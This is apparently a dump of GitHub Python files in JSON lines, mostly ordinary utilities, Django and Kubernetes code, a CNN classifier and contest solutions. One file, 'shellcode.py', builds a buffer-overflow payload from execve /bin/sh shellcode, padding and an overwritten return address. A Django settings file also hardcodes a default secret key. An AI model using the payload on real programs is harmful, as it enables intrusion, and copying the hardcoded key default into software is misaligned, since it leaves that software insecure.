extension: the file extension\n :return: the files\n \"\"\"\n if not os.path.isdir(directory):\n raise Exception(\"The param 'directory' should be a directory\")\n\n _file_list = []\n for _item in os.listdir(directory):\n _item_full_path = os.path.join(directory, _item)\n if os.path.isdir(_item_full_path):\n for _file in get_files(os.path.join(directory, _item), extension):\n _file_list.append(_file)\n else:\n _name, _extension = os.path.splitext(_item_full_path)\n if _extension.lower() == extension.lower():\n _file_list.append(_item_full_path)\n\n return _file_list\n\n\ndef have_file(directory, file_name, extension=\".json\"):\n \"\"\"\n Check if the directory contains specified file\n :param directory: the directory\n :param file_name: the file name\n :param extension: the file extension\n :return: True or False\n \"\"\"\n for _file in get_files(directory, extension):\n if os.path.split(_file)[1].lower() == file_name.lower():\n return True\n\n return False\n","repo_name":"supor/label_UI","sub_path":"Framework/Test-Automation/framework/taf_utility.py","file_name":"taf_utility.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10349007430","text":"#!/usr/bin/python\n\nimport sys\nimport re\n\nlines = []\nmatch = 0\n\nfor line in sys.stdin:\n\tlines.append(line)\n\nfor line in lines:\n\tif \"{{title}}\" in line:\n\t\ttitle = \"Some Page :)\"\n\t\tfor c_line in lines:\n\t\t #DOC: finds first h2 and uses text inside as title\n\t\t\tif \"\" in c_line and match == 0:\n\t\t\t\ttitle = re.search(r\"[^<]+<\\/h2>\", c_line).group()[4:-5]\n\t\t\t\tmatch = 1\n\t\tline = line.replace(\"{{title}}\", title)\n\tsys.stdout.write(line)\n\n","repo_name":"flber/mx","sub_path":"plugins/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"}
+{"seq_id":"2829236314","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('goblin', '0002_projectlink'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectlink',\n name='type',\n field=models.CharField(default=datetime.datetime(2015, 4, 29, 21, 22, 3, 951741, tzinfo=utc), max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='projectlink',\n name='url',\n field=models.URLField(default='about:blank'),\n preserve_default=False,\n ),\n ]\n","repo_name":"src-r-r/django-project-goblin","sub_path":"goblin/migrations/0003_auto_20150429_1422.py","file_name":"0003_auto_20150429_1422.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29318223057","text":"import sys\nimport tempfile\n\nfrom envprobe.community_descriptions import downloader, local_data\nfrom envprobe.vartypes import EnvVarExtendedInformation\n\n\nname = 'descriptions'\ndescription = \\\n \"\"\"\n The 'descriptions' subcommand allows access to the \"Envprobe Variable\n Descriptions Knowledge Base\" project.\n \"\"\"\nhelp = \"Access facilities related to the \\\"variable desciptions\\\" project\"\n\nupdate_name = 'update'\nupdate_description = \\\n \"\"\"\n Check if the descriptions project has a newer version available.\n If there is, the data will be downloaded and extracted and subsequent calls\n to Envprobe will behave according to the new information, if no\n user-specific settings exist.\n\n This command requires Internet access.\n \"\"\"\nupdate_help = \"Download varaible descriptions from the Internet.\"\n\nepilogue = \\\n \"\"\"\n The canonical repository for this sister project is avaiable at:\n http://github.com/whisperity/Envprobe-Descriptions\n \"\"\"\n\n\ndef update_command(args):\n print(\"Checking for latest version of the Envprobe Variable Descriptions \"\n \"Knowledge Base project.\")\n storage_cfg = local_data.get_storage_configuration(read_only=False)\n new_version = downloader.fetch_latest_version_information()\n\n if new_version == storage_cfg.version:\n # Right now, we use a simple equality check, because the versions are\n # pure commit IDs.\n print(\"Nothing to update - the latest data is already available.\")\n return\n\n # Open all the variable information managers for the saved data. This is\n # needed so we can gather which keys to delete.\n variables_to_clear = set()\n for manager in local_data.generate_variable_information_managers():\n variables_to_clear.update(manager.keys())\n\n with tempfile.TemporaryDirectory(prefix=\"envprobe-community-kb-\") as tempd:\n sources = downloader.download_latest_data(tempd)\n for source in sources:\n print(\"Extracting '{}'...\".format(source.name))\n try:\n source.parse()\n except Exception as e:\n print(\"[WARN] Failed to parse '{}':\\t{}\"\n .format(source.name, str(e)),\n file=sys.stderr)\n continue\n\n storage_cfg.set_comment_for(source.name, source.comment)\n set_vars = 0\n for variable in source:\n information = EnvVarExtendedInformation()\n information.apply(source[variable])\n\n try:\n manager = local_data.get_variable_information_manager(\n variable, read_only=False)\n manager.set(variable, information, source.name)\n set_vars += 1\n\n try:\n variables_to_clear.remove(variable)\n except KeyError:\n pass\n except Exception as e:\n print(\"[WARN] Failed to update configuration for \"\n \"'{}':\\t{}\".format(variable, str(e)),\n file=sys.stderr)\n continue\n print(\"\\textracted {} variables.\".format(set_vars))\n\n print(\"Cleaning up old information...\")\n set_vars = 0\n for variable in variables_to_clear:\n try:\n manager = local_data.get_variable_information_manager(\n variable, read_only=False)\n del manager[variable]\n set_vars += 1\n except Exception as e:\n print(\"[WARN] Failed to clean up '{}':\\t{}\".format(variable,\n str(e)),\n file=sys.stderr)\n print(\"\\tcleaned up {} records.\".format(set_vars))\n\n storage_cfg.version = new_version\n\n\ndef register_update(argparser):\n parser = argparser.add_parser(\n name=update_name,\n description=update_description,\n help=update_help,\n epilog=epilogue\n )\n\n parser.set_defaults(func=update_command)\n\n\ndef register(argparser, shell):\n parser = argparser.add_parser(\n name=name,\n description=description,\n 
help=help,\n epilog=epilogue\n )\n subparsers = parser.add_subparsers(\n title=\"available_commands\")\n\n register_update(subparsers)\n","repo_name":"whisperity/envprobe","sub_path":"src/envprobe/commands/descriptions.py","file_name":"descriptions.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
+{"seq_id":"33670279844","text":"\"\"\"\nBase settings to build other settings files upon.\n\"\"\"\nimport os\n\nfrom pathlib import Path\n\nimport environ\n\nfrom django.utils.translation import gettext_lazy as _\n\n\nROOT_DIR = Path(__file__).resolve(strict=True).parent.parent\nAPPS_DIR = ROOT_DIR / \"ghibil\"\nenv = environ.Env()\n\nREAD_DOT_ENV_FILE = env.bool(\"DJANGO_READ_DOT_ENV_FILE\", default=True)\nif READ_DOT_ENV_FILE:\n # OS environment variables take precedence over variables from .env\n env.read_env(str(ROOT_DIR / \".env\"))\n\n# GENERAL\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = env.bool(\"DJANGO_DEBUG\", False)\n# Local time zone. Choices are\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# though not all of them may be available with every OS.\n# In Windows, this must be set to your system time zone.\nTIME_ZONE = \"UTC\"\n# https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = \"en-us\"\n# https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#languages\nLANGUAGES = [(\"en-us\", _(\"English\")), (\"de-de\", _(\"German\"))]\n# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths\nLOCALE_PATHS = [str(ROOT_DIR / \"locale\")]\n\n# DATABASES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(ROOT_DIR, \"db.sqlite3\"),\n },\n}\n# URLS\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf\nROOT_URLCONF = \"config.urls\"\n\n# APPS\n# -----------------------------------------------------------------------------\nDJANGO_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"django.contrib.admin\",\n]\nTHIRD_PARTY_APPS = [\n \"rest_framework\",\n]\n\nLOCAL_APPS = [\n \"ghibil.movies.apps.MoviesAppConfig\",\n]\n# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# MIDDLEWARE\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#middleware\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\n# TEMPLATES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n 
\"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"LJvMIEyCZ4lM9onk5EyhaeioR6R9CHJ3VaMiCsBepsA9ER6CQp1lNPIBRnX6Ax3h\",\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\n# CACHES\n# -----------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": env.get_value(\n var=\"REDIS_URL\", default=\"redis://127.0.0.1:6379/0\",\n ),\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n}\nSTATIC_URL = \"/static/\"\n","repo_name":"abtinmo/ghibil","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74863115741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 15:33:25 2017\n\n@author: oreilly\n\"\"\"\n\nfrom .modelingParameter import getParameterTypeNameFromID\n\n# Equivalence rules. These are define such that\n# parameterEquivalenceRules[idFrom][idTo] is giving a rule to convert\n# values from an entity idFrom to an entity idTo. This rule is specified as \n# a lambda function that that has to be applies to the values of the \n# given parameters.\nparameterEquivalenceRules = {}\n\n#\"BBP-131005\":volume_brain_region\n#\"BBP-131006\":volume_unilateral_brain_region\nparameterEquivalenceRules[\"BBP-131005\"] = {\"BBP-131006\":lambda x: x/2}\nparameterEquivalenceRules[\"BBP-131006\"] = {\"BBP-131005\":lambda x: x*2}\n\n\n\nclass EquivalenceFinder:\n \n def __init__(self, condition):\n self.condition = condition\n\n\n def run(self):\n # Apply rules for parameter equivalences\n return self.applyParameterEquivalence(self.condition)\n \n \n def applyParameterEquivalence(self, condition):\n \n for idFrom in parameterEquivalenceRules:\n for idTo in parameterEquivalenceRules[idFrom]:\n condition.addEquivalences(\"Parameter type ID\", idFrom, idTo, parameterEquivalenceRules[idFrom][idTo])\n condition.addEquivalences(\"Parameter name\", \n getParameterTypeNameFromID(idFrom), \n getParameterTypeNameFromID(idTo), \n parameterEquivalenceRules[idFrom][idTo])\n \n return condition","repo_name":"BlueBrain/nat","sub_path":"nat/equivalenceFinder.py","file_name":"equivalenceFinder.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"27696572637","text":"### Load the data ###\n\nlabels = ['normal','abnormal']\nimage_size = 224\n\n# Borrowed \"get_data\" function from\n# https://www.analyticsvidhya.com/blog/2020/10/create-image-classification-model-python-keras/\n\nimport os \nimport cv2 \nimport numpy as np\n\ndef get_data(data_dir):\n data = []\n for label in labels:\n path = os.path.join(data_dir,label)\n class_num = labels.index(label)\n for img in os.listdir(path):\n try:\n img_arr = cv2.imread(os.path.join(path,img))[...,::-1] # Convert BGR to RGB format\n resized_arr = cv2.resize(img_arr, (image_size, image_size)) # Reshape images to preferred size\n data.append([resized_arr, class_num])\n except Exception as e:\n print(e)\n return np.array(data)\n\ntrain = get_data('../two_class_post_weld/train') ## define current path to the train folder\nval = get_data('../two_class_post_weld/test') ## define current path to the test folder\n\n### Compare the number of the images in both cases ###\n\nimport seaborn as sns\n\ncount_number = []\nfor i in train:\n if(i[1]==0):\n count_number.append(\"normal\")\n else:\n count_number.append(\"abnormal\")\n\nsns.set_style('whitegrid')\nsns.countplot(count_number)\n\n### Visualize a random image from both classes ###\n\nimport matplotlib.pyplot as plt\n\n# visualize a normal welding image\nplt.figure(figsize = (5,5))\nplt.imshow(train[1][0])\nplt.title(labels[train[0][1]])\n\n# visualize a abnormal welding image\nplt.figure(figsize = (5,5))\nplt.imshow(train[-1][0])\nplt.title(labels[train[-1][1]])\n\n### Data Preprocessing ###\n\n# split the data into feature and label\n\nx_train = []\ny_train = []\nx_val = []\ny_val = []\n\nfor feature, label in train:\n x_train.append(feature)\n y_train.append(label)\n\nfor feature, label in val:\n x_val.append(feature)\n y_val.append(label)\n\n# normalize the data\n\nimport numpy as np\n\nx_train = np.array(x_train) / 255\nx_val = np.array(x_val) / 255\n\nx_train.reshape(-1, image_size, image_size, 1)\ny_train = np.array(y_train)\n\nx_val.reshape(-1, image_size, image_size,1)\ny_val = np.array(y_val)\n\n# data augmentation \n\nfrom keras.preprocessing.image import ImageDataGenerator\n\ndata_generator = ImageDataGenerator(\n featurewise_center=False, # False to input mean zero\n samplewise_center=False, # False tosample mean zero\n featurewise_std_normalization=False, # False to divide input by its standard deviation\n samplewise_std_normalization=False, # False to divide sample by its standard deviation\n zca_whitening=False, # False to apply ZCA whitening\n rotation_range=25, # rotate images in 25 degree\n zoom_range=0.3, # zoom images 0.3 times\n width_shift_range=0.1, # shift images 0.1 horizontally (fraction of total width)\n height_shift_range=0.1, # shift images 0.1 vertically (fraction of total height)\n horizontal_flip=True, # flip images horizontally\n vertical_flip=True) # flip images vertically\n\ndata_generator.fit(x_train)\n\n### Build the model ###\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Flatten, Dropout\n\nmodel = 
Sequential()\nmodel.add(Conv2D(8,3,padding=\"same\",activation=\"relu\",input_shape=(224,224,3)))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(16,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(32,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Conv2D(64,3,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPool2D())\nmodel.add(Dropout(0.4))\n\nmodel.add(Flatten())\nmodel.add(Dense(128,activation=\"relu\"))\nmodel.add(Dense(2,activation=\"softmax\"))\n\nmodel.summary()\n\n### Evaluate the results ###\n\nimport tensorflow as tf\nfrom keras.optimizers import SGD, Adam\n\nopt = Adam(lr=0.000001)\nmodel.compile(optimizer=opt, loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['accuracy'])\n\nhistory = model.fit(x_train, y_train, epochs=500, validation_data=(x_val,y_val))\n\nacc= history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(500)\n\nplt.figure(figsize=(15,15))\nplt.subplot(2,2,1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(2,2,2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\nfrom sklearn.metrics import classification_report\n\npredictions = model.predict_classes(x_val)\npredictions = predictions.reshape(1,-1)[0]\nprint(classification_report(y_val, predictions, target_names = ['normal welding (Class 0)','abnormal welding(Class 1)']))\n","repo_name":"ykim836/ECE","sub_path":"post_welding_code.py","file_name":"post_welding_code.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13695741484","text":"import argparse\nimport binascii\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"addr\", type=str)\nparser.add_argument(\"pad\", type=int)\n\ndef write_pld(addr, pad):\n\tfw = open('pld', 'wb')\n\t\n\t# Write shellcode\n\tfw.write(b'\\x31\\xc0')\n\tfw.write(b'\\x50')\n\tfw.write(b'\\x68\\x6e\\x2f\\x73\\x68')\n\tfw.write(b'\\x68\\x2f\\x2f\\x62\\x69')\n\tfw.write(b'\\x89\\xe3')\n\tfw.write(b'\\x99')\n\tfw.write(b'\\x52')\n\tfw.write(b'\\x56')\n\tfw.write(b'\\x89\\xe1')\n\tfw.write(b'\\xb0\\x0b')\n\tfw.write(b'\\xcd\\x80')\n\n\t# Write pad\n\tfor i in range(pad):\n\t\tfw.write(b'\\x90')\n\n\t# Convert and write addr\n\t# 0xabcdefgh -> \\xgh\\xef\\xcd\\xab\n\tformat_str = \"{gh}{ef}{cd}{ab}\"\n\taddr_formatted = format_str.format(ab=addr[:2],\n\t\t\t\t\t cd=addr[2:4],\n\t\t\t\t\t ef=addr[4:6],\n\t\t\t\t\t gh=addr[6:])\n\tprint(addr_formatted)\n\taddr_bytes = binascii.a2b_hex(addr_formatted)\n\tfw.write(addr_bytes)\n\n\tfw.close()\n\n\nif __name__ == '__main__':\n\targs = parser.parse_args()\n\taddr = args.addr\n\twhile len(addr) < 8:\n\t\taddr = \"0\" + addr\n\twrite_pld(addr, args.pad)\n\n","repo_name":"JaredDobry/brute_shellcode","sub_path":"shellcode.py","file_name":"shellcode.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72685341664","text":"from typing import Optional, List\nfrom collections import deque\nfrom BinaryTree.TreeNodeModule import TreeNode\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def zigzagLevelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n\n # node and depth\n queue = deque([(root, 1)])\n answer = []\n while queue:\n node, depth = queue.pop()\n if node.left:\n queue.appendleft((node.left, depth + 1))\n if node.right:\n queue.appendleft((node.right, depth + 1))\n \n if depth > len(answer):\n answer.append([])\n answer[-1].append(node.val)\n \n return [level if depth % 2 == 0 else list(reversed(level)) for depth, level in enumerate(answer)]\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BinaryTree/BinaryTreeZigzagLevelOrderTraversal/BFS103.py","file_name":"BFS103.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"94528515","text":"\"\"\" Python 3 compatibility tools. \"\"\"\nfrom __future__ import division, print_function\nimport itertools\nimport sys\nimport os\nfrom io import BytesIO, IOBase\n\n\nif sys.version_info[0] < 3:\n input = raw_input\n range = xrange\n\n filter = itertools.ifilter\n map = itertools.imap\n zip = itertools.izip\n\n\ndef is_it_local():\n script_dir = str(os.getcwd()).split('/')\n username = \"dipta007\"\n return username in script_dir\n\n\ndef READ(fileName):\n if is_it_local():\n sys.stdin = open(f'./{fileName}', 'r')\n\n# region fastio\nBUFSIZE = 8192\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self):\n while self.newlines == 0:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n os.write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\nif not is_it_local():\n sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\n input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\n\n# endregion\n\n\ndef input1(type=int):\n return type(input())\n\n\ndef input2(type=int):\n [a, b] = list(map(type, input().split()))\n return a, b\n\n\ndef input3(type=int):\n [a, b, c] = list(map(type, input().split()))\n return a, b, c\n\n\ndef input_array(type=int):\n return list(map(type, input().split()))\n\n\ndef input_string():\n s = input()\n return list(s)\n\n##############################################################\n\ndef is_it_okay(st01, st10):\n return abs(st01 - st10) <= 1\n\ndef is_it_double(st, mp):\n if mp.get(st[::-1], 0) == 1:\n return True\n return False\n\ndef main():\n t = input1()\n for ci in range(t):\n n = input1()\n\n mat = []\n st01, st10 = 0, 0\n mp = {}\n for i in range(n):\n st = input()\n now = [st]\n mp[st] = 1\n\n if st[0] == '0' and st[-1] == '1':\n st01 += 1\n now.append(0)\n now.append(1)\n elif st[0] == '1' and st[-1] == '0':\n st10 += 1\n now.append(1)\n now.append(0)\n else:\n now.append(ord(st[0]) - 48)\n now.append(ord(st[-1]) - 48)\n \n mat.append(now)\n\n swapped = []\n # print(st01, st10)\n\n # No 0...1 or 1...0\n if st01 == 0 and st10 == 0:\n flg = 0\n nw = mat[0]\n for [st, a, b] in mat:\n if nw[1] != a or nw[2] != b:\n print(-1)\n flg = 1\n break\n if not flg:\n print(0)\n print(\"\")\n elif is_it_okay(st01, st10):\n print(0)\n print(\"\")\n else:\n for i, [s, a, b] in enumerate(mat):\n if st01 > st10 + 1 and a == 0 and b == 1 and not is_it_double(s, mp):\n swapped.append(i)\n mp[s] -= 1\n mp[s[::-1]] = 1\n st01 -= 1\n st10 += 
1\n elif st10 > st01 + 1 and a == 1 and b == 0 and not is_it_double(s, mp):\n swapped.append(i)\n mp[s] -= 1\n mp[s[::-1]] = 1\n st10 -= 1\n st01 += 1\n\n if is_it_okay(st01, st10):\n print(len(swapped))\n print(\" \".join([str(x+1) for x in swapped]))\n else:\n print(-1)\n\n\n pass\n\nif __name__ == '__main__':\n # READ('in.txt')\n main()","repo_name":"dipta007/Competitive-Programming","sub_path":"Codeforces/Practice/1277D.py","file_name":"1277D.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
+{"seq_id":"28152643454","text":"#!/usr/bin/env python3\r\n\"\"\"Take the code from wait_n and alter it into a new function task_wait_n\"\"\"\r\nfrom typing import List\r\n\r\ntask_wait_random = __import__('3-tasks').task_wait_random\r\n\r\n\r\nasync def task_wait_n(n: int, max_delay: int) -> List[float]:\r\n \"\"\"task_wait_n\"\"\"\r\n wList = []\r\n for i in range(n):\r\n wList.append(await task_wait_random(max_delay))\r\n return sorted(wList)\r\n ","repo_name":"maycolroa/holbertonschool-web_back_end","sub_path":"0x01-python_async_function/4-tasks.py","file_name":"4-tasks.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31237061872","text":"import json\n\nfrom http.server import BaseHTTPRequestHandler\nfrom package.mongoServer import MongoServer\n\nDOCUMENT_MAIN_KEY = \"document\"\n\nclass Server(BaseHTTPRequestHandler):\n def __init__(self, request, client_address, server):\n print(\"testing\")\n self._mongo_server = MongoServer()\n super().__init__(request, client_address, server)\n\n def do_GET(self):\n self._set_response()\n\n def do_POST(self):\n document_post: dict = self._get_json_content_from_request()\n if document_post.get(DOCUMENT_MAIN_KEY) != None:\n self._mongo_server.write_document_to_database(document_post.get(DOCUMENT_MAIN_KEY))\n self._set_response()\n else:\n self._set_error_response(\"The json request does not have an document key!\")\n\n\n def _get_json_content_from_request(self) -> object:\n content_type = self.headers.get(\"content-type\")\n if content_type != \"application/json\":\n self._set_error_response(\"Bad formatted request! It is not an application/json.\")\n else:\n content_length = int(self.headers.get(\"content-length\"))\n return json.loads(self.rfile.read(content_length))\n\n def _set_response(self):\n self.send_response(200)\n self.end_headers()\n\n def _set_error_response(self, message: str):\n self.send_response(400, message)\n self.end_headers()","repo_name":"GoldenCodeRam/Project-Olive","sub_path":"database-backup-server/src/package/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24913178583","text":"from math import log2\nfrom typing import Union\n\nimport torch\nfrom numpy import ndarray\nfrom torch import Tensor\n\nfrom .utils import my_clamp, my_round\n\n\ndef _integer_quantize(\n x: Union[Tensor, ndarray], width: int, frac_width: int, is_signed: bool = True\n):\n \"\"\"\n - Do linear quantization to input according to a scale and number of bits\n - Note that `bias` can be negative or larger than `bits`\n\n ---\n - forward: convert IEEE FP32/64 to fixed-point\n - backward: STE\n\n ---\n width: the bit width of the fixed-point number\n frac_width: the number of fractional bits. Note that `bias` can be negative or larger than `bits`\n\n ---\n For example: 0b101 . 00111, bits = 8, bias = 5\n\n \"\"\"\n if is_signed:\n int_min = -(2 ** (width - 1))\n int_max = 2 ** (width - 1) - 1\n else:\n int_min = 0\n int_max = 2**width - 1\n # thresh = 2 ** (width - 1)\n scale = 2**frac_width\n\n if isinstance(x, (Tensor, ndarray)):\n return my_clamp(my_round(x.mul(scale)), int_min, int_max).div(scale)\n elif isinstance(x, int):\n return x\n else:\n return my_clamp(my_round(x * scale), int_min, int_max) / scale\n\n\nclass IntegerQuantize(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x, width, frac_width, is_signed):\n return _integer_quantize(\n x, width=width, frac_width=frac_width, is_signed=is_signed\n )\n\n @staticmethod\n def backward(ctx, grad_output):\n \"\"\"\n STE shortcut for saving GPU memory\n \"\"\"\n return grad_output, None, None, None\n\n\ndef integer_quantizer(\n x: Union[Tensor, ndarray], width: int, frac_width: int, is_signed: bool = True\n):\n \"\"\"\n - Do linear quantization to input according to a scale and number of bits\n - Note that `bias` can be negative or larger than `bits`\n\n ---\n - forward: convert IEEE FP32/64 to fixed-point\n - backward: STE\n\n ---\n width: the bit width of the fixed-point number\n frac_width: the number of fractional bits. Note that `bias` can be negative or larger than `bits`\n\n ---\n For example: 0b101 . 00111, bits = 8, bias = 5\n\n \"\"\"\n return IntegerQuantize.apply(x, width, frac_width, is_signed)\n\n\ndef integer_fraction(\n width: int, frac_choices: list, min_value: float, max_value: float\n):\n max_half_range = max(abs(min_value), abs(max_value))\n int_width = int(log2(max(0.5, max_half_range))) + 2\n frac_width = max(0, width - int_width)\n frac_width = max(filter(lambda x: x <= frac_width, frac_choices))\n return frac_width\n","repo_name":"ChengZhang-98/llm-mixed-q","sub_path":"src/llm_mixed_q/models/quantize/quantizers/integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"71352540384","text":"from kubernetes import client, config\nfrom kubernetes.client import ApiClient\nfrom kubernetes.client.rest import ApiException\nimport yaml\nimport json\n\nconfig.load_kube_config()\nv1 = client.CoreV1Api()\n\ndef __format_data_for_create_configmap(client_output):\n temp_dict={}\n temp_list=[]\n json_data=ApiClient().sanitize_for_serialization(client_output)\n \n if type(json_data) is str:\n print(\"FORMAT_DATA :{}\".format(type(json_data)))\n json_data = json.loads(json_data)\n temp_list.append(json_data)\n return temp_list\n\ndef create_configmap(yaml_body=None,namespace=\"default\"):\n try:\n yaml_data=open(\"config.yaml\", \"rb\").read().decode('utf-8')\n yaml_body=yaml.safe_load(yaml_data)\n resp = v1.create_namespaced_config_map(\n body=yaml_body, namespace=\"{}\".format(namespace))\n\n data=__format_data_for_create_configmap(resp)\n print (data) \n except ApiException as e:\n print(\"ERROR IN create_configmap:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\ndef update_configmap(k8s_object_name=None,yaml_body=None,namespace=\"default\"):\n try:\n yaml_data=open(\"change_config.yaml\", \"rb\").read().decode('utf-8')\n yaml_body=yaml.safe_load(yaml_data)\n resp = v1.patch_namespaced_config_map(\n name=k8s_object_name,\n 